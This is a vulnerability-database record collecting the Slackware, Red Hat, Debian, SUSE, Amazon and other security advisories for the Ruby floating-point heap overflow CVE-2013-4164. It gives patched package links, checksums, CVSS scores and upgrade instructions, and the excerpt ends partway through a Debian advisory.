{"id": "SSA-2013-350-06", "type": "slackware", "bulletinFamily": "unix", "title": "[slackware-security] ruby", "description": "New ruby packages are available for Slackware 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/ruby-1.9.3_p484-i486-1_slack14.1.txz: Upgraded.\n This update fixes a heap overflow in floating point parsing. A specially\n crafted string could cause a heap overflow leading to a denial of service\n attack via segmentation faults and possibly arbitrary code execution.\n For more information, see:\n https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ruby-1.9.3_p484-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ruby-1.9.3_p484-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ruby-1.9.3_p484-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ruby-1.9.3_p484-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ruby-1.9.3_p484-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ruby-1.9.3_p484-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ruby-1.9.3_p484-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ruby-1.9.3_p484-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/ruby-1.9.3_p484-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/ruby-1.9.3_p484-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\na9c7fc1b752d9dbebf729639768f0ff9 ruby-1.9.3_p484-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\nb78129d604ac455d1b28d54f28c2742a ruby-1.9.3_p484-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nb195b07dff2bea6a3c4ad26686ed2bfe ruby-1.9.3_p484-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\na24d37e579ec1756896fabe5c158a83a ruby-1.9.3_p484-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n334fab8b88a0474b7ddd551c3f945492 ruby-1.9.3_p484-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nad5cc7610fd06dae0bcae1b89c8b9659 ruby-1.9.3_p484-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n74555154cbd4bac223f6121f30821f1f ruby-1.9.3_p484-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n172e5c26ed18318e28668820e36ac0a0 ruby-1.9.3_p484-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nb865aec63c8a52ad041ea3d7b6febfda d/ruby-1.9.3_p484-i486-1.txz\n\nSlackware x86_64 -current package:\n9ddaa67e1d06d2d37eda294b749ff91d d/ruby-1.9.3_p484-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.9.3_p484-i486-1_slack14.1.txz", "published": "2013-12-17T03:50:10", "modified": "2013-12-17T03:50:10", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2013&m=slackware-security.484609", "reporter": "Slackware Linux Project", "references": [], "cvelist": ["CVE-2013-4164"], "lastseen": "2020-10-25T16:35:58", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4164"]}, {"type": "f5", "idList": ["SOL15152"]}, {"type": "centos", "idList": ["CESA-2013:1764"]}, {"type": "amazon", "idList": ["ALAS-2013-247", "ALAS-2013-248"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1828-1", "SUSE-SU-2013:1897-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1764"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30768", "SECURITYVULNS:VULN:13434", "SECURITYVULNS:VULN:13711", "SECURITYVULNS:DOC:30550", "SECURITYVULNS:DOC:31300", "SECURITYVULNS:VULN:14050", "SECURITYVULNS:DOC:30039", "SECURITYVULNS:VULN:13795"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2810-1:75D31", "DEBIAN:DSA-2809-1:8D55D"]}, {"type": "redhat", "idList": ["RHSA-2013:1767", "RHSA-2013:1763", "RHSA-2014:0011", "RHSA-2014:0215", "RHSA-2013:1764"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/RAILS_JSON_FLOAT_DOS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120115", "OPENVAS:1361412562310120122", "OPENVAS:1361412562310871087", "OPENVAS:1361412562310903502", "OPENVAS:871087", "OPENVAS:1361412562310892810", "OPENVAS:1361412562310867350", "OPENVAS:892810", "OPENVAS:867350", "OPENVAS:1361412562310123518"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_CC9043CF7F7A426EB2CC8D1980618113.NASL", "CENTOS_RHSA-2013-1764.NASL", "REDHAT-RHSA-2013-1764.NASL", "OPENSUSE-2013-940.NASL", "OPENSUSE-2013-943.NASL", "SOLARIS11_RUBY_20140731.NASL", "REDHAT-RHSA-2013-1767.NASL", "FEDORA_2013-22423.NASL", "FEDORA_2013-22315.NASL", "MANDRIVA_MDVSA-2013-286.NASL"]}, {"type": "fedora", "idList": ["FEDORA:4921D21B74", "FEDORA:9BC562114D", "FEDORA:0AF5A221D6"]}, {"type": "freebsd", "idList": ["CC9043CF-7F7A-426E-B2CC-8D1980618113"]}, {"type": "ubuntu", "idList": ["USN-2035-1"]}, {"type": "hackerone", "idList": ["H1:499"]}, {"type": "gentoo", "idList": ["GLSA-201412-27"]}], "modified": "2020-10-25T16:35:58", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2020-10-25T16:35:58", "rev": 2}, "vulnersScore": 8.2}, "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.1", "arch": "i486", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-i486-1_slack13.1.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "arch": "x86_64", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-x86_64-1_slack13.1.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "arch": "i486", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-i486-1_slack13.37.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.37", "arch": "x86_64", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-x86_64-1_slack13.37.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "arch": "i486", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-i486-1_slack14.0.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.0", "arch": "x86_64", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-x86_64-1_slack14.0.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "arch": "i486", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-i486-1_slack14.1.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "14.1", "arch": "x86_64", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-x86_64-1_slack14.1.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "current", "arch": "i486", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-i486-1.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "current", "arch": "x86_64", "packageName": "ruby", "packageVersion": "1.9.3_p484", "packageFilename": "ruby-1.9.3_p484-x86_64-1.txz", "operator": "lt"}]}

{"cve": [{"lastseen": "2021-02-02T06:06:55", "description": "Heap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before revision 43780 allows context-dependent attackers to cause a denial of service (segmentation fault) and possibly execute arbitrary code via a string that is converted to a floating point value, as demonstrated using (1) the to_f method or (2) JSON.parse.", "edition": 4, "cvss3": {}, "published": "2013-11-23T19:55:00", "title": "CVE-2013-4164", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4164"], "modified": "2018-01-09T02:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:1.9.2", "cpe:/a:ruby-lang:ruby:2.1", "cpe:/a:ruby-lang:ruby:2.0.0", "cpe:/a:ruby-lang:ruby:1.9", "cpe:/a:ruby-lang:ruby:1.8", "cpe:/a:ruby-lang:ruby:1.9.1", "cpe:/a:ruby-lang:ruby:1.9.3"], "id": "CVE-2013-4164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4164", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.1:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.0.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:23:21", "bulletinFamily": "software", "cvelist": ["CVE-2013-4164"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15152.html", "id": "SOL15152", "title": "SOL15152 - Ruby vulnerability CVE-2013-4164", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-12-20T18:25:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1764\n\n\nRuby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007324.html\n\n**Affected packages:**\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-rdoc\nruby-ri\nruby-static\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1764.html", "edition": 3, "modified": "2013-11-26T13:37:12", "published": "2013-11-26T13:37:12", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007324.html", "id": "CESA-2013:1764", "title": "ruby security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "**Issue Overview:**\n\nHeap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before revision 43780 allows context-dependent attackers to cause a denial of service (segmentation fault) and possibly execute arbitrary code via a string that is converted to a floating point value, as demonstrated using (1) the to_f method or (2) JSON.parse. \n\n \n**Affected Packages:** \n\n\nruby19\n\n \n**Issue Correction:** \nRun _yum update ruby19_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n rubygem19-json-1.5.5-31.55.amzn1.i686 \n rubygem19-io-console-0.3-31.55.amzn1.i686 \n ruby19-libs-1.9.3.484-31.55.amzn1.i686 \n rubygem19-bigdecimal-1.1.0-31.55.amzn1.i686 \n ruby19-1.9.3.484-31.55.amzn1.i686 \n ruby19-debuginfo-1.9.3.484-31.55.amzn1.i686 \n ruby19-doc-1.9.3.484-31.55.amzn1.i686 \n ruby19-devel-1.9.3.484-31.55.amzn1.i686 \n \n noarch: \n ruby19-irb-1.9.3.484-31.55.amzn1.noarch \n rubygem19-minitest-2.5.1-31.55.amzn1.noarch \n rubygem19-rdoc-3.9.5-31.55.amzn1.noarch \n rubygems19-1.8.23-31.55.amzn1.noarch \n rubygems19-devel-1.8.23-31.55.amzn1.noarch \n rubygem19-rake-0.9.2.2-31.55.amzn1.noarch \n \n src: \n ruby19-1.9.3.484-31.55.amzn1.src \n \n x86_64: \n ruby19-doc-1.9.3.484-31.55.amzn1.x86_64 \n rubygem19-bigdecimal-1.1.0-31.55.amzn1.x86_64 \n ruby19-devel-1.9.3.484-31.55.amzn1.x86_64 \n ruby19-debuginfo-1.9.3.484-31.55.amzn1.x86_64 \n ruby19-1.9.3.484-31.55.amzn1.x86_64 \n ruby19-libs-1.9.3.484-31.55.amzn1.x86_64 \n rubygem19-io-console-0.3-31.55.amzn1.x86_64 \n rubygem19-json-1.5.5-31.55.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-11-22T21:42:00", "published": "2013-11-22T21:42:00", "id": "ALAS-2013-247", "href": "https://alas.aws.amazon.com/ALAS-2013-247.html", "title": "Critical: ruby19", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:37:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "**Issue Overview:**\n\nHeap-based buffer overflow in Ruby 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, and trunk before revision 43780 allows context-dependent attackers to cause a denial of service (segmentation fault) and possibly execute arbitrary code via a string that is converted to a floating point value, as demonstrated using (1) the to_f method or (2) JSON.parse. \n\n \n**Affected Packages:** \n\n\nruby\n\n \n**Issue Correction:** \nRun _yum update ruby_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n ruby-debuginfo-1.8.7.374-2.11.amzn1.i686 \n ruby-devel-1.8.7.374-2.11.amzn1.i686 \n ruby-1.8.7.374-2.11.amzn1.i686 \n ruby-libs-1.8.7.374-2.11.amzn1.i686 \n ruby-static-1.8.7.374-2.11.amzn1.i686 \n ruby-ri-1.8.7.374-2.11.amzn1.i686 \n \n noarch: \n ruby-rdoc-1.8.7.374-2.11.amzn1.noarch \n ruby-irb-1.8.7.374-2.11.amzn1.noarch \n \n src: \n ruby-1.8.7.374-2.11.amzn1.src \n \n x86_64: \n ruby-debuginfo-1.8.7.374-2.11.amzn1.x86_64 \n ruby-devel-1.8.7.374-2.11.amzn1.x86_64 \n ruby-libs-1.8.7.374-2.11.amzn1.x86_64 \n ruby-ri-1.8.7.374-2.11.amzn1.x86_64 \n ruby-static-1.8.7.374-2.11.amzn1.x86_64 \n ruby-1.8.7.374-2.11.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-11-22T21:42:00", "published": "2013-11-22T21:42:00", "id": "ALAS-2013-248", "href": "https://alas.aws.amazon.com/ALAS-2013-248.html", "title": "Critical: ruby", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "This update fixes a severe security bug in ruby19:\n\n * CVE-2013-4164: heap overflow in float point parsing\n could lead to crashes and code execution\n", "edition": 1, "modified": "2013-12-17T00:04:23", "published": "2013-12-17T00:04:23", "id": "SUSE-SU-2013:1897-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-12/msg00009.html", "title": "Security update for ruby19 (critical)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:03:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689", "CVE-2013-4164"], "description": "The following security issue has been fixed:\n\n * CVE-2013-4164: heap overflow in float point parsing\n", "edition": 1, "modified": "2013-12-05T18:04:15", "published": "2013-12-05T18:04:15", "id": "SUSE-SU-2013:1828-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-12/msg00001.html", "type": "suse", "title": "Security update for ruby (critical)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2015-04-24T14:20:16", "published": "2013-11-26T05:00:00", "id": "RHSA-2013:1767", "href": "https://access.redhat.com/errata/RHSA-2013:1767", "type": "redhat", "title": "(RHSA-2013:1767) Critical: ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nUsers of Red Hat OpenStack 3.0 are advised to upgrade to these updated\npackages, which correct this issue.\n", "modified": "2018-06-13T01:27:36", "published": "2014-01-07T05:00:00", "id": "RHSA-2014:0011", "href": "https://access.redhat.com/errata/RHSA-2014:0011", "type": "redhat", "title": "(RHSA-2014:0011) Critical: ruby193-ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:15", "published": "2013-11-25T05:00:00", "id": "RHSA-2013:1764", "href": "https://access.redhat.com/errata/RHSA-2013:1764", "type": "redhat", "title": "(RHSA-2013:1764) Critical: ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language.\nIt has features to process text files and to perform system management\ntasks.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nAll ruby193-ruby users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\n", "modified": "2018-06-13T01:28:18", "published": "2013-11-25T05:00:00", "id": "RHSA-2013:1763", "href": "https://access.redhat.com/errata/RHSA-2013:1763", "type": "redhat", "title": "(RHSA-2013:1763) Critical: ruby193-ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:31:23", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0186", "CVE-2013-4164", "CVE-2014-0057", "CVE-2014-0081", "CVE-2014-0082"], "description": "Red Hat CloudForms Management Engine delivers the insight, control, and\nautomation enterprises need to address the challenges of managing virtual\nenvironments, which are far more complex than physical ones. This\ntechnology enables enterprises with existing virtual infrastructures\nto improve visibility and control, and those just starting virtualization\ndeployments to build and operate a well-managed virtual infrastructure.\n\nA buffer overflow flaw was found in the way Ruby parsed floating point\nnumbers from their text representation. If an application using Ruby\naccepted untrusted input strings and converted them to floating point\nnumbers, an attacker able to provide such input could cause the application\nto crash or, possibly, execute arbitrary code with the privileges of the\napplication. (CVE-2013-4164)\n\nIt was found that Red Hat CloudForms Management Engine did not properly\nsanitize user-supplied values in the ServiceController. A remote attacker\ncould invoke arbitrary method calls in the application controller that, due\nto a lack of sanitization, could allow access to private methods that could\npossibly allow the attacker to execute arbitrary code on the host system.\n(CVE-2014-0057)\n\nIt was found that several number conversion helpers in Action View did not\nproperly escape all their parameters. An attacker could use these flaws to\nperform a cross-site scripting (XSS) attack on an application that uses\ndata submitted by a user as parameters to the affected helpers.\n(CVE-2014-0081)\n\nA memory consumption issue was discovered in the text rendering component\nof Action View. A remote attacker could use this flaw to perform a denial\nof service attack by sending specially crafted queries that would result in\nthe creation of Ruby symbols that were never garbage collected.\n(CVE-2014-0082)\n\nRed Hat would like to thank the Ruby on Rails Project for reporting\nCVE-2014-0081 and CVE-2014-0082. Upstream acknowledges Kevin Reintjes as\nthe original reporter of CVE-2014-0081, and Toby Hsieh of SlideShare as the\noriginal reporter of CVE-2014-0082. The CVE-2014-0057 issue was discovered\nby Jan Rusnacko of the Red Hat Product Security Team.\n\nThis update fixes several bugs and adds multiple enhancements.\nDocumentation for these changes will be available shortly from the Red Hat\nCloudForms 3.0 Management Engine 5.2 Technical Notes linked to in the\nReferences section.\n\nAll users of Red Hat CloudForms are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues and add\nthese enhancements.\n", "modified": "2015-04-24T14:18:51", "published": "2014-03-11T04:00:00", "id": "RHSA-2014:0215", "href": "https://access.redhat.com/errata/RHSA-2014:0215", "type": "redhat", "title": "(RHSA-2014:0215) Critical: cfme security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "\nRuby developers report:\n\nAny time a string is converted to a floating point value, a\n\t specially crafted string can cause a heap overflow. This can lead\n\t to a denial of service attack via segmentation faults and possibly\n\t arbitrary code execution. Any program that converts input of\n\t unknown origin to floating point values (especially common when\n\t accepting JSON) are vulnerable.\n\t \n\n", "edition": 4, "modified": "2013-11-22T00:00:00", "published": "2013-11-22T00:00:00", "id": "CC9043CF-7F7A-426E-B2CC-8D1980618113", "href": "https://vuxml.freebsd.org/freebsd/cc9043cf-7f7a-426e-b2cc-8d1980618113.html", "title": "ruby -- Heap Overflow in Floating Point Parsing", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "[1.8.7.352-13]\n- Workaround build issues against OpenSSL with enabled ECC curves.\n- Make DRb compatible with OpenSSL 1.0.1.\n * ruby-1.9.3-p222-generate-1024-bits-RSA-key-instead-of-512-bits.patch\n- Fix CVE-2013-4164 Heap Overflow in Floating Point Parsing\n * ruby-1.9.3-p484-CVE-2013-4164-ignore-too-long-fraction-part-which-does-not-affect-the-result.patch\n - Resolves: rhbz#1033500", "edition": 4, "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "ELSA-2013-1764", "href": "http://linux.oracle.com/errata/ELSA-2013-1764.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:28:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2810-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 04, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby1.9.1\nVulnerability : heap overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-4164\nDebian Bug : 730178\n\nCharlie Somerville discovered that Ruby incorrectly handled floating\npoint number conversion. If an application using Ruby accepted untrusted\ninput strings and converted them to floating point numbers, an attacker\nable to provide such input could cause the application to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.9.2.0-2+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.9.3.194-8.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.9.3.484-1.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2013-12-04T22:30:11", "published": "2013-12-04T22:30:11", "id": "DEBIAN:DSA-2810-1:75D31", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00224.html", "title": "[SECURITY] [DSA 2810-1] ruby1.9.1 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:20:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1821", "CVE-2013-4073", "CVE-2013-4164"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2809-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 04, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby1.8\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1821 CVE-2013-4073 CVE-2013-4164\nDebian Bug : 702526 714541 730189\n\nSeveral vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2013-1821\n\n Ben Murphy discovered that unrestricted entity expansion in REXML\n can lead to a Denial of Service by consuming all host memory.\n\nCVE-2013-4073\n\n William (B.J.) Snow Orvis discovered a vulnerability in the hostname\n checking in Ruby&#x27;s SSL client that could allow man-in-the-middle\n attackers to spoof SSL servers via a crafted certificate issued by a\n trusted certification authority.\n\nCVE-2013-4164\n\n Charlie Somerville discovered that Ruby incorrectly handled floating\n point number conversion. If an application using Ruby accepted\n untrusted input strings and converted them to floating point\n numbers, an attacker able to provide such input could cause the\n application to crash or, possibly, execute arbitrary code with the\n privileges of the application.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.8.7.302-2squeeze2.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.7.358-7.1+deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.358-9.\n\nWe recommend that you upgrade your ruby1.8 